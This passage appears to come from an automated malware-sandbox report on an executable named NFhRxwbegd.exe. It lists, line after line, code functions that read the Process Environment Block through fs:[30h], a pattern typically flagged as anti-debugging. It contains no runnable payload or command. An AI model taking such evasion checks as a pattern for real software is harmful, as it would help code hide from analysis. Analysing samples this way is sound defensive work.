                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE53E mov eax, dword ptr fs:[00000030h]5_2_018FE53E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE53E mov eax, dword ptr fs:[00000030h]5_2_018FE53E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE53E mov eax, dword ptr fs:[00000030h]5_2_018FE53E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE53E mov eax, dword ptr fs:[00000030h]5_2_018FE53E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE53E mov eax, dword ptr fs:[00000030h]5_2_018FE53E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0535 mov eax, dword ptr fs:[00000030h]5_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0535 mov eax, dword ptr fs:[00000030h]5_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0535 mov eax, dword ptr fs:[00000030h]5_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0535 mov eax, dword ptr fs:[00000030h]5_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0535 mov eax, dword ptr fs:[00000030h]5_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0535 mov eax, dword ptr fs:[00000030h]5_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D8550 mov eax, dword ptr fs:[00000030h]5_2_018D8550
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D8550 mov eax, dword ptr fs:[00000030h]5_2_018D8550
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190656A mov eax, dword ptr fs:[00000030h]5_2_0190656A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190656A mov eax, dword ptr fs:[00000030h]5_2_0190656A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190656A mov eax, dword ptr fs:[00000030h]5_2_0190656A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0198A49A mov eax, dword ptr fs:[00000030h]5_2_0198A49A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019044B0 mov ecx, dword ptr fs:[00000030h]5_2_019044B0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195A4B0 mov eax, dword ptr fs:[00000030h]5_2_0195A4B0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D64AB mov eax, dword ptr fs:[00000030h]5_2_018D64AB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D04E5 mov ecx, dword ptr fs:[00000030h]5_2_018D04E5
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01908402 mov eax, dword ptr fs:[00000030h]5_2_01908402
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01908402 mov eax, dword ptr fs:[00000030h]5_2_01908402
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01908402 mov eax, dword ptr fs:[00000030h]5_2_01908402
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A430 mov eax, dword ptr fs:[00000030h]5_2_0190A430
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CC427 mov eax, dword ptr fs:[00000030h]5_2_018CC427
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CE420 mov eax, dword ptr fs:[00000030h]5_2_018CE420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CE420 mov eax, dword ptr fs:[00000030h]5_2_018CE420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CE420 mov eax, dword ptr fs:[00000030h]5_2_018CE420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01956420 mov eax, dword ptr fs:[00000030h]5_2_01956420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0198A456 mov eax, dword ptr fs:[00000030h]5_2_0198A456
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018C645D mov eax, dword ptr fs:[00000030h]5_2_018C645D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E443 mov eax, dword ptr fs:[00000030h]5_2_0190E443
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F245A mov eax, dword ptr fs:[00000030h]5_2_018F245A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195C460 mov ecx, dword ptr fs:[00000030h]5_2_0195C460
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FA470 mov eax, dword ptr fs:[00000030h]5_2_018FA470
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FA470 mov eax, dword ptr fs:[00000030h]5_2_018FA470
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FA470 mov eax, dword ptr fs:[00000030h]5_2_018FA470
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197678E mov eax, dword ptr fs:[00000030h]5_2_0197678E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D07AF mov eax, dword ptr fs:[00000030h]5_2_018D07AF
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019847A0 mov eax, dword ptr fs:[00000030h]5_2_019847A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DC7C0 mov eax, dword ptr fs:[00000030h]5_2_018DC7C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019507C3 mov eax, dword ptr fs:[00000030h]5_2_019507C3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F27ED mov eax, dword ptr fs:[00000030h]5_2_018F27ED
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F27ED mov eax, dword ptr fs:[00000030h]5_2_018F27ED
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F27ED mov eax, dword ptr fs:[00000030h]5_2_018F27ED
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195E7E1 mov eax, dword ptr fs:[00000030h]5_2_0195E7E1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D47FB mov eax, dword ptr fs:[00000030h]5_2_018D47FB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D47FB mov eax, dword ptr fs:[00000030h]5_2_018D47FB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01900710 mov eax, dword ptr fs:[00000030h]5_2_01900710
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C700 mov eax, dword ptr fs:[00000030h]5_2_0190C700
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D0710 mov eax, dword ptr fs:[00000030h]5_2_018D0710
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194C730 mov eax, dword ptr fs:[00000030h]5_2_0194C730
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190273C mov eax, dword ptr fs:[00000030h]5_2_0190273C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190273C mov ecx, dword ptr fs:[00000030h]5_2_0190273C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190273C mov eax, dword ptr fs:[00000030h]5_2_0190273C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C720 mov eax, dword ptr fs:[00000030h]5_2_0190C720
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C720 mov eax, dword ptr fs:[00000030h]5_2_0190C720
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01954755 mov eax, dword ptr fs:[00000030h]5_2_01954755
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912750 mov eax, dword ptr fs:[00000030h]5_2_01912750
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912750 mov eax, dword ptr fs:[00000030h]5_2_01912750
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195E75D mov eax, dword ptr fs:[00000030h]5_2_0195E75D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D0750 mov eax, dword ptr fs:[00000030h]5_2_018D0750
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190674D mov esi, dword ptr fs:[00000030h]5_2_0190674D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190674D mov eax, dword ptr fs:[00000030h]5_2_0190674D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190674D mov eax, dword ptr fs:[00000030h]5_2_0190674D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D8770 mov eax, dword ptr fs:[00000030h]5_2_018D8770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0770 mov eax, dword ptr fs:[00000030h]5_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D4690 mov eax, dword ptr fs:[00000030h]5_2_018D4690
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D4690 mov eax, dword ptr fs:[00000030h]5_2_018D4690
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019066B0 mov eax, dword ptr fs:[00000030h]5_2_019066B0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C6A6 mov eax, dword ptr fs:[00000030h]5_2_0190C6A6
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0190A6C7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A6C7 mov eax, dword ptr fs:[00000030h]5_2_0190A6C7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019506F1 mov eax, dword ptr fs:[00000030h]5_2_019506F1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019506F1 mov eax, dword ptr fs:[00000030h]5_2_019506F1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E6F2 mov eax, dword ptr fs:[00000030h]5_2_0194E6F2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E6F2 mov eax, dword ptr fs:[00000030h]5_2_0194E6F2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E6F2 mov eax, dword ptr fs:[00000030h]5_2_0194E6F2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E6F2 mov eax, dword ptr fs:[00000030h]5_2_0194E6F2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E260B mov eax, dword ptr fs:[00000030h]5_2_018E260B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912619 mov eax, dword ptr fs:[00000030h]5_2_01912619
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E609 mov eax, dword ptr fs:[00000030h]5_2_0194E609
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D262C mov eax, dword ptr fs:[00000030h]5_2_018D262C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EE627 mov eax, dword ptr fs:[00000030h]5_2_018EE627
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01906620 mov eax, dword ptr fs:[00000030h]5_2_01906620
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01908620 mov eax, dword ptr fs:[00000030h]5_2_01908620
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EC640 mov eax, dword ptr fs:[00000030h]5_2_018EC640
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01902674 mov eax, dword ptr fs:[00000030h]5_2_01902674
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A660 mov eax, dword ptr fs:[00000030h]5_2_0190A660
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A660 mov eax, dword ptr fs:[00000030h]5_2_0190A660
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199866E mov eax, dword ptr fs:[00000030h]5_2_0199866E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199866E mov eax, dword ptr fs:[00000030h]5_2_0199866E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D09AD mov eax, dword ptr fs:[00000030h]5_2_018D09AD
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D09AD mov eax, dword ptr fs:[00000030h]5_2_018D09AD
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019589B3 mov esi, dword ptr fs:[00000030h]5_2_019589B3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019589B3 mov eax, dword ptr fs:[00000030h]5_2_019589B3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019589B3 mov eax, dword ptr fs:[00000030h]5_2_019589B3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A0 mov eax, dword ptr fs:[00000030h]5_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019049D0 mov eax, dword ptr fs:[00000030h]5_2_019049D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199A9D3 mov eax, dword ptr fs:[00000030h]5_2_0199A9D3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019669C0 mov eax, dword ptr fs:[00000030h]5_2_019669C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA9D0 mov eax, dword ptr fs:[00000030h]5_2_018DA9D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA9D0 mov eax, dword ptr fs:[00000030h]5_2_018DA9D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA9D0 mov eax, dword ptr fs:[00000030h]5_2_018DA9D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA9D0 mov eax, dword ptr fs:[00000030h]5_2_018DA9D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA9D0 mov eax, dword ptr fs:[00000030h]5_2_018DA9D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DA9D0 mov eax, dword ptr fs:[00000030h]5_2_018DA9D0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019029F9 mov eax, dword ptr fs:[00000030h]5_2_019029F9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019029F9 mov eax, dword ptr fs:[00000030h]5_2_019029F9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195E9E0 mov eax, dword ptr fs:[00000030h]5_2_0195E9E0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195C912 mov eax, dword ptr fs:[00000030h]5_2_0195C912
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018C8918 mov eax, dword ptr fs:[00000030h]5_2_018C8918
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018C8918 mov eax, dword ptr fs:[00000030h]5_2_018C8918
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E908 mov eax, dword ptr fs:[00000030h]5_2_0194E908
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194E908 mov eax, dword ptr fs:[00000030h]5_2_0194E908
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0196892B mov eax, dword ptr fs:[00000030h]5_2_0196892B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195892A mov eax, dword ptr fs:[00000030h]5_2_0195892A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01950946 mov eax, dword ptr fs:[00000030h]5_2_01950946
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195C97C mov eax, dword ptr fs:[00000030h]5_2_0195C97C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F6962 mov eax, dword ptr fs:[00000030h]5_2_018F6962
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F6962 mov eax, dword ptr fs:[00000030h]5_2_018F6962
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F6962 mov eax, dword ptr fs:[00000030h]5_2_018F6962
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01974978 mov eax, dword ptr fs:[00000030h]5_2_01974978
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01974978 mov eax, dword ptr fs:[00000030h]5_2_01974978
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0191096E mov eax, dword ptr fs:[00000030h]5_2_0191096E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0191096E mov edx, dword ptr fs:[00000030h]5_2_0191096E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0191096E mov eax, dword ptr fs:[00000030h]5_2_0191096E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195C89D mov eax, dword ptr fs:[00000030h]5_2_0195C89D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D0887 mov eax, dword ptr fs:[00000030h]5_2_018D0887
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE8C0 mov eax, dword ptr fs:[00000030h]5_2_018FE8C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C8F9 mov eax, dword ptr fs:[00000030h]5_2_0190C8F9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C8F9 mov eax, dword ptr fs:[00000030h]5_2_0190C8F9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199A8E4 mov eax, dword ptr fs:[00000030h]5_2_0199A8E4
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195C810 mov eax, dword ptr fs:[00000030h]5_2_0195C810
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190A830 mov eax, dword ptr fs:[00000030h]5_2_0190A830
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197483A mov eax, dword ptr fs:[00000030h]5_2_0197483A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197483A mov eax, dword ptr fs:[00000030h]5_2_0197483A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2835 mov eax, dword ptr fs:[00000030h]5_2_018F2835
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2835 mov eax, dword ptr fs:[00000030h]5_2_018F2835
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2835 mov eax, dword ptr fs:[00000030h]5_2_018F2835
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2835 mov ecx, dword ptr fs:[00000030h]5_2_018F2835
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2835 mov eax, dword ptr fs:[00000030h]5_2_018F2835
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2835 mov eax, dword ptr fs:[00000030h]5_2_018F2835
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01900854 mov eax, dword ptr fs:[00000030h]5_2_01900854
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E2840 mov ecx, dword ptr fs:[00000030h]5_2_018E2840
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D4859 mov eax, dword ptr fs:[00000030h]5_2_018D4859
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D4859 mov eax, dword ptr fs:[00000030h]5_2_018D4859
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01966870 mov eax, dword ptr fs:[00000030h]5_2_01966870
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01966870 mov eax, dword ptr fs:[00000030h]5_2_01966870
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195E872 mov eax, dword ptr fs:[00000030h]5_2_0195E872
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195E872 mov eax, dword ptr fs:[00000030h]5_2_0195E872
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01984BB0 mov eax, dword ptr fs:[00000030h]5_2_01984BB0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01984BB0 mov eax, dword ptr fs:[00000030h]5_2_01984BB0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0BBE mov eax, dword ptr fs:[00000030h]5_2_018E0BBE
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0BBE mov eax, dword ptr fs:[00000030h]5_2_018E0BBE
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D0BCD mov eax, dword ptr fs:[00000030h]5_2_018D0BCD
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D0BCD mov eax, dword ptr fs:[00000030h]5_2_018D0BCD
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D0BCD mov eax, dword ptr fs:[00000030h]5_2_018D0BCD
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F0BCB mov eax, dword ptr fs:[00000030h]5_2_018F0BCB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F0BCB mov eax, dword ptr fs:[00000030h]5_2_018F0BCB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F0BCB mov eax, dword ptr fs:[00000030h]5_2_018F0BCB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197EBD0 mov eax, dword ptr fs:[00000030h]5_2_0197EBD0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195CBF0 mov eax, dword ptr fs:[00000030h]5_2_0195CBF0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FEBFC mov eax, dword ptr fs:[00000030h]5_2_018FEBFC
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D8BF0 mov eax, dword ptr fs:[00000030h]5_2_018D8BF0
